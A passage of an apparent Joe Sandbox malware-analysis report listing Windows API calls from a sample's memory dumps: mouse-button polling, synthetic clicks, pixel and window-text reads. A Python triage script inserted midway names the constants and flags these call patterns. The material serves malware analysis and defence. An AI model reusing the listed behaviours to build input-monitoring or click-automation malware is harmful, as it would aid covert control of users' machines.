                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                    • String ID:
                                                                    • API String ID: 1389676194-0
                                                                    • Opcode ID: 99a61582e3e1cdf277c60d90f6d620443b3d8bad3b4aefaed780c9a97c628462
                                                                    • Instruction ID: bd7c5a92e9c2accc682e343f9be95b839a4ff9d811a4cfc04b2e3d729cf180c3
                                                                    • Opcode Fuzzy Hash: 99a61582e3e1cdf277c60d90f6d620443b3d8bad3b4aefaed780c9a97c628462
                                                                    • Instruction Fuzzy Hash: 98513C35A00205DFCB01EFA4C9819AEBBF5EF49350F188099E949AB362CB75ED11EF50
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3eded7f61fb17eb214451d143f44bb0b47e0125d2f200dd60732baf26b4ea184
                                                                    • Instruction ID: 4cec05af12c93e30e2fdac58380f0c5511a9679b291c2ca56bd76bd8082688eb
                                                                    • Opcode Fuzzy Hash: 3eded7f61fb17eb214451d143f44bb0b47e0125d2f200dd60732baf26b4ea184
                                                                    • Instruction Fuzzy Hash: 73419335A04204EFD7A1DA68CC58FABBFE8FB09390F040295FE95A72D1CB349941DB64
                                                                    APIs
                                                                    • GetCursorPos.USER32(?), ref: 00FD2357
                                                                    • ScreenToClient.USER32(010957B0,?), ref: 00FD2374
                                                                    • GetAsyncKeyState.USER32(00000001), ref: 00FD2399
                                                                    • GetAsyncKeyState.USER32(00000002), ref: 00FD23A7
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: AsyncState$ClientCursorScreen
                                                                    • String ID:
                                                                    • API String ID: 4210589936-0
                                                                    • Opcode ID: 848fe4a80551ddb1f3ff1ec9334ac71076633536522b53d4dde38e52b185bcb6
                                                                    • Instruction ID: 9d6f58db873de636c2a82c7386100586170c0d2066e80b135e5f4454ddc1081e
                                                                    • Opcode Fuzzy Hash: 848fe4a80551ddb1f3ff1ec9334ac71076633536522b53d4dde38e52b185bcb6
                                                                    • Instruction Fuzzy Hash: 4A41B235A04106FBEF669F68C844AEEBBB5FB15320F24435AF868922D0C7359950EF91
                                                                    APIs
                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 010263E7
                                                                    • TranslateAcceleratorW.USER32(?,?,?), ref: 01026433
                                                                    • TranslateMessage.USER32(?), ref: 0102645C
                                                                    • DispatchMessageW.USER32(?), ref: 01026466
                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 01026475
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                                    • String ID:
                                                                    • API String ID: 2108273632-0
                                                                    • Opcode ID: 0ab8d20ec3fd4643373f8b0c990a8414c61111ef596fc83e292b2c70be2bac34
                                                                    • Instruction ID: 471e39d6da7e2f512dde4abb614042e653b167763438b1a80f13bf06ce088954
                                                                    • Opcode Fuzzy Hash: 0ab8d20ec3fd4643373f8b0c990a8414c61111ef596fc83e292b2c70be2bac34
                                                                    • Instruction Fuzzy Hash: 4931C6319002669FDB75CE75DC54BB7BBEDBB05300F1441A6E9E1C3195EB2B9045C760
                                                                    APIs
                                                                    • GetWindowRect.USER32(?,?), ref: 01028A30
                                                                    • PostMessageW.USER32(?,00000201,00000001), ref: 01028ADA
                                                                    • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 01028AE2
                                                                    • PostMessageW.USER32(?,00000202,00000000), ref: 01028AF0
                                                                    • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 01028AF8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: MessagePostSleep$RectWindow
                                                                    • String ID:
                                                                    • API String ID: 3382505437-0
                                                                    • Opcode ID: 245452b1ab352e931935665be3260e86f3c5ae0b53badf691d18d4c3c2571153
                                                                    • Instruction ID: 86f156e708676acdaa850d54ebc8feb0ca677ab068f57daa7f7b8c759d1c373e
                                                                    • Opcode Fuzzy Hash: 245452b1ab352e931935665be3260e86f3c5ae0b53badf691d18d4c3c2571153
                                                                    • Instruction Fuzzy Hash: AB31C07150022AEBEF14CFA8D94CA9E3BF5FB05315F10825AF965E71C1C7B49914CB90
                                                                    APIs
                                                                    • IsWindowVisible.USER32(?), ref: 0102B204
                                                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0102B221
                                                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0102B259
                                                                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0102B27F
                                                                    • _wcsstr.LIBCMT ref: 0102B289
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                    • String ID:
                                                                    • API String ID: 3902887630-0
                                                                    • Opcode ID: 659581ba730f6151e7ae179bb9f520d8effc9d9c5ff287afd1fd7d1540b5a2d7
                                                                    • Instruction ID: 776d766a9b23a97c41d76a662578b1e10789853f8d1565ab3ee21ed81c258a29
                                                                    • Opcode Fuzzy Hash: 659581ba730f6151e7ae179bb9f520d8effc9d9c5ff287afd1fd7d1540b5a2d7
                                                                    • Instruction Fuzzy Hash: DB2104326043157BEB259B799C09E7F7BDCDF4A760F004169F944DA1A2EE69D84093A0
                                                                    APIs
                                                                      • Part of subcall function 00FD2612: GetWindowLongW.USER32(?,000000EB), ref: 00FD2623
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0105B192
                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0105B1B7
                                                                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0105B1CF
                                                                    • GetSystemMetrics.USER32(00000004), ref: 0105B1F8
                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,01040E90,00000000), ref: 0105B216
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Long$MetricsSystem
                                                                    • String ID:
                                                                    • API String ID: 2294984445-0
                                                                    • Opcode ID: 0b49c6aaa3afcbd3eae640b52c1ed93d28686a81f0e6c55e3696e398eb11f557
                                                                    • Instruction ID: ab2754dd36c495bfa51fb63f361a5cfd71b11ffb996def20c9c967bf45d056d9
                                                                    • Opcode Fuzzy Hash: 0b49c6aaa3afcbd3eae640b52c1ed93d28686a81f0e6c55e3696e398eb11f557
                                                                    • Instruction Fuzzy Hash: 9A21B171914216AFCBA09E39DC08A6F3BA5FB05361F104729FEB2D71D0D735A810CB90
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 01029320
                                                                      • Part of subcall function 00FD7BCC: _memmove.LIBCMT ref: 00FD7C06
                                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 01029352
                                                                    • __itow.LIBCMT ref: 0102936A
                                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 01029392
                                                                    • __itow.LIBCMT ref: 010293A3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$__itow$_memmove
                                                                    • String ID:
                                                                    • API String ID: 2983881199-0
                                                                    • Opcode ID: c24c93f5afe031157cd6e6154a6555f4298d04f8568a1046c0740baa418294dd
                                                                    • Instruction ID: 5081546d02a3726ab24e7e295500ab67b05bc5b103a0d551157dc95a944d2b9f
                                                                    • Opcode Fuzzy Hash: c24c93f5afe031157cd6e6154a6555f4298d04f8568a1046c0740baa418294dd
                                                                    • Instruction Fuzzy Hash: CC212C317003297BDB10AA648C85EEF7BEDEF88714F049026FE84DB2C1D674C94197A1
                                                                    APIs
                                                                    • IsWindow.USER32(00000000), ref: 01045A6E
                                                                    • GetForegroundWindow.USER32 ref: 01045A85
                                                                    • GetDC.USER32(00000000), ref: 01045AC1
                                                                    • GetPixel.GDI32(00000000,?,00000003), ref: 01045ACD
                                                                    • ReleaseDC.USER32(00000000,00000003), ref: 01045B08
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ForegroundPixelRelease
                                                                    • String ID:
                                                                    • API String ID: 4156661090-0
                                                                    • Opcode ID: 140fe34af1b2f833e9b5954d360e63b986cc3bb82da05ec527c9f38c3f16faf3
                                                                    • Instruction ID: fd8b1eb5a336c056e7e950d60d6aea715d71f1e30890c521fe6602008e8c0d81
                                                                    • Opcode Fuzzy Hash: 140fe34af1b2f833e9b5954d360e63b986cc3bb82da05ec527c9f38c3f16faf3
                                                                    • Instruction Fuzzy Hash: 4C218475A00205AFD714EFA5DC88AAABBE9EF48310F048479F889D7351CB79ED00DB90
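The API call lists above are easier to read once their numeric arguments are named: the PostMessageW(?,00000201,...)/PostMessageW(?,00000202,...) pair is WM_LBUTTONDOWN/WM_LBUTTONUP, SendMessageW with 0000000E/0000000D is WM_GETTEXTLENGTH/WM_GETTEXT, GetAsyncKeyState(00000001)/(00000002) polls VK_LBUTTON/VK_RBUTTON, SendMessageW with 00001004/0000102C is LVM_GETITEMCOUNT/LVM_GETITEMSTATE, and the LoadLibraryW/GetProcAddress/FreeLibrary entry resolves imports at run time. The script below is an added example, not part of the Joe Sandbox report or of the analysed sample: it parses call lines in the report's own format, names the constants it knows, and flags a few call combinations per function. SAMPLE_REPORT is constructed from three of the entries above; the RULES are the script's own triage heuristics, not Joe Sandbox signatures; and reading 000000F0/000000EC/000000EB in the GetWindowLongW/SetWindowLongW entry as the sign-extended byte form of the negative indices GWL_STYLE (-16), GWL_EXSTYLE (-20) and GWL_USERDATA (-21) is an assumption about how the plugin prints small immediates.

```python
"""Name the constants in a Joe Sandbox 'APIs' listing and flag call combinations.

Added example, not part of the Joe Sandbox report or of the analysed sample.
SAMPLE_REPORT is constructed from three entries of the listing, in the report's
own line format; RULES are this script's own triage heuristics.
"""
import re
from dataclasses import dataclass, field

# Window / list-view messages and virtual-key codes as pushed in the listing.
WM = {0x0D: "WM_GETTEXT", 0x0E: "WM_GETTEXTLENGTH",
      0x201: "WM_LBUTTONDOWN", 0x202: "WM_LBUTTONUP",
      0x1004: "LVM_GETITEMCOUNT", 0x102C: "LVM_GETITEMSTATE"}
GWL = {-16: "GWL_STYLE", -20: "GWL_EXSTYLE", -21: "GWL_USERDATA"}
VK = {0x01: "VK_LBUTTON", 0x02: "VK_RBUTTON"}
MSG_APIS = {"SendMessageW", "PostMessageW"}

# One call line: optional "Part of subcall function XXXX:", Name.MODULE,
# optional "(args)", then "ref: ADDR". Args are 8-hex-digit immediates or "?".
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>[A-Za-z_][A-Za-z_0-9]*)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")


@dataclass
class Call:
    name: str
    module: str
    args: list      # int for an immediate, None for "?"
    ref: int
    subcall: bool   # reached through a callee, not made by this function itself


@dataclass
class Function:
    calls: list = field(default_factory=list)
    opcode_id: str = ""


def parse_listing(text):
    """An 'APIs' header opens a function's call list; its 'Opcode ID' closes it."""
    funcs, cur = [], None
    for line in text.splitlines():
        s = line.strip()
        if s == "APIs":
            cur = Function()
            funcs.append(cur)
        elif s.startswith("• Opcode ID:") and cur is not None:
            cur.opcode_id = s.split(":", 1)[1].strip()
            cur = None
        elif cur is not None and (m := API_LINE.match(line)):
            args = [int(a, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", a.strip()) else None
                    for a in (m["args"] or "").split(",") if a.strip()]
            cur.calls.append(Call(m["name"], m["module"], args, int(m["ref"], 16),
                                  "Part of subcall" in line))
    return funcs


def gwl_name(v):
    """GetWindowLong indices are negative. Assumption: the plugin prints a small
    negative push as its sign-extended byte (000000F0 for -16), so that form is
    accepted alongside the full 32-bit two's-complement form."""
    if v is None:
        return None
    if v < 0x100:
        v = v - 0x100 if v >= 0x80 else v
    elif v >= 1 << 31:
        v -= 1 << 32
    return GWL.get(v)


def describe(call):
    """Render a call with the constants this script knows spelled out."""
    arg = lambda i: call.args[i] if i < len(call.args) else None
    if call.name in MSG_APIS and arg(1) in WM:
        return f"{call.name}({WM[arg(1)]})"
    if call.name in ("GetWindowLongW", "SetWindowLongW") and gwl_name(arg(1)):
        return f"{call.name}({gwl_name(arg(1))})"
    if call.name == "GetAsyncKeyState" and arg(0) in VK:
        return f"{call.name}({VK[arg(0)]})"
    return call.name


# Triage heuristics over a function's own (non-subcall) calls:
# (label, predicate over plain API names n and described calls d).
RULES = [
    ("runtime API resolution", lambda n, d: {"LoadLibraryW", "GetProcAddress"} <= n),
    ("synthetic mouse click",
     lambda n, d: {"PostMessageW(WM_LBUTTONDOWN)", "PostMessageW(WM_LBUTTONUP)"} <= d),
    ("mouse button polling", lambda n, d: "GetCursorPos" in n and bool(
        {"GetAsyncKeyState(VK_LBUTTON)", "GetAsyncKeyState(VK_RBUTTON)"} & d)),
    ("case-insensitive window text search",
     lambda n, d: "SendMessageW(WM_GETTEXT)" in d and {"CharUpperBuffW", "_wcsstr"} <= n),
    ("INI file read/write", lambda n, d: any(
        x.startswith(("GetPrivateProfile", "WritePrivateProfile")) for x in n)),
    ("screen pixel read", lambda n, d: {"GetDC", "GetPixel"} <= n),
]


def triage(func):
    own = [c for c in func.calls if not c.subcall]
    names, described = {c.name for c in own}, {describe(c) for c in own}
    return [label for label, pred in RULES if pred(names, described)]


SAMPLE_REPORT = """\
APIs
  • Part of subcall function 00FD9837: __itow.LIBCMT ref: 00FD9862
• LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0104D927
• GetProcAddress.KERNEL32(00000000,?), ref: 0104D9AA
• FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0104DA21
• Opcode ID: d540b1ae43455bd2589052d8b8cc33d177ab42273d2fb9149c67427329f52fbc
APIs
• GetWindowRect.USER32(?,?), ref: 01028A30
• PostMessageW.USER32(?,00000201,00000001), ref: 01028ADA
• Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 01028AE2
• PostMessageW.USER32(?,00000202,00000000), ref: 01028AF0
• Opcode ID: 245452b1ab352e931935665be3260e86f3c5ae0b53badf691d18d4c3c2571153
APIs
• IsWindowVisible.USER32(?), ref: 0102B204
• SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0102B221
• SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0102B259
• CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0102B27F
• _wcsstr.LIBCMT ref: 0102B289
• Opcode ID: 659581ba730f6151e7ae179bb9f520d8effc9d9c5ff287afd1fd7d1540b5a2d7
"""

if __name__ == "__main__":
    for f in parse_listing(SAMPLE_REPORT):
        print(f.opcode_id[:12], [describe(c) for c in f.calls if not c.subcall], triage(f))
```

Subcall lines ("Part of subcall function ...") are kept in the parse but excluded from triage, so a helper's __itow or WideCharToMultiByte does not get attributed to every caller; to run this over the full report, paste the function listing into the text passed to parse_listing.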
APIs
• ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00FD134D
• SelectObject.GDI32(?,00000000), ref: 00FD135C
• BeginPath.GDI32(?), ref: 00FD1373
• SelectObject.GDI32(?,00000000), ref: 00FD139C
Memory Dump Source
• Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
Similarity
• API ID: ObjectSelect$BeginCreatePath
• String ID:
• API String ID: 3225163088-0
• Opcode ID: 5b639d2f45b67f78b34ab7aa3dc4000ee7cd6a0d56f4539aa973362e7d0f2095
• Instruction ID: 5163852bfb88c51d48714171d10ff0fa8fa24721cb01e0257d65f8b6dbe46f77
• Opcode Fuzzy Hash: 5b639d2f45b67f78b34ab7aa3dc4000ee7cd6a0d56f4539aa973362e7d0f2095
• Instruction Fuzzy Hash: F4217431801309EFDB229F16DC0476B7BE9FB04321F284217F490AA294D77A9891EF90
APIs
• GetCurrentThreadId.KERNEL32 ref: 01034ABA
• __beginthreadex.LIBCMT ref: 01034AD8
• MessageBoxW.USER32(?,?,?,?), ref: 01034AED
• WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 01034B03
• CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 01034B0A
Memory Dump Source
• Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
Similarity
• API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
• String ID:
• API String ID: 3824534824-0
• Opcode ID: 5e7902ce62e5a93c1f281ef799286009fdfc4b0c2843adcde42ef9ca7f796b9f
• Instruction ID: f6f47a06013d93026f2dfa4b3a005726ae4033506910c7609e638e169e2ea751
• Opcode Fuzzy Hash: 5e7902ce62e5a93c1f281ef799286009fdfc4b0c2843adcde42ef9ca7f796b9f
• Instruction Fuzzy Hash: 92116B72904308BFD7219FBDDC08A9F7FACEB86320F04429AF994D7240D67A890087A0
APIs
• GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0102821E
• GetLastError.KERNEL32(?,01027CE2,?,?,?), ref: 01028228
• GetProcessHeap.KERNEL32(00000008,?,?,01027CE2,?,?,?), ref: 01028237
• HeapAlloc.KERNEL32(00000000,?,01027CE2,?,?,?), ref: 0102823E
• GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 01028255
Memory Dump Source
• Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
Similarity
• API ID: HeapObjectSecurityUser$AllocErrorLastProcess
• String ID:
• API String ID: 842720411-0
• Opcode ID: 93cadc16216151516f3780b61926a5d8b90573ec759c075b9cbc083cffd55d75
• Instruction ID: 7551471a3832f0ce7333b9da6c7216f2207db310edd489f00ff15544a30fe064
• Opcode Fuzzy Hash: 93cadc16216151516f3780b61926a5d8b90573ec759c075b9cbc083cffd55d75
• Instruction Fuzzy Hash: 8A016D75201315BFEB205FA9DC48D6B7FECEF8A654B50446AF989C3210DA3A8C04CB70
APIs
• CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,01027044,80070057,?,?,?,01027455), ref: 01027127
• ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,01027044,80070057,?,?), ref: 01027142
• lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,01027044,80070057,?,?), ref: 01027150
• CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,01027044,80070057,?), ref: 01027160
• CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,01027044,80070057,?,?), ref: 0102716C
Memory Dump Source
• Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
Similarity
• API ID: From$Prog$FreeStringTasklstrcmpi
• String ID:
• API String ID: 3897988419-0
• Opcode ID: 68a6dac7f5cafe24e47f9b39f343e934e4f26fcb57c7e1b228e3b44c728a90d5
• Instruction ID: 84e9df0dcebaef203f6b88bc21edf270a50a44b62911152a2efec54fbb56d00a
• Opcode Fuzzy Hash: 68a6dac7f5cafe24e47f9b39f343e934e4f26fcb57c7e1b228e3b44c728a90d5
• Instruction Fuzzy Hash: 86018476601325BBDB214F68DC44BABBFEEEF44651F244054FE84D2214D73ADD408BA0
APIs
• QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 01035260
• QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0103526E
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 01035276
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 01035280
• Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 010352BC
Memory Dump Source
• Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
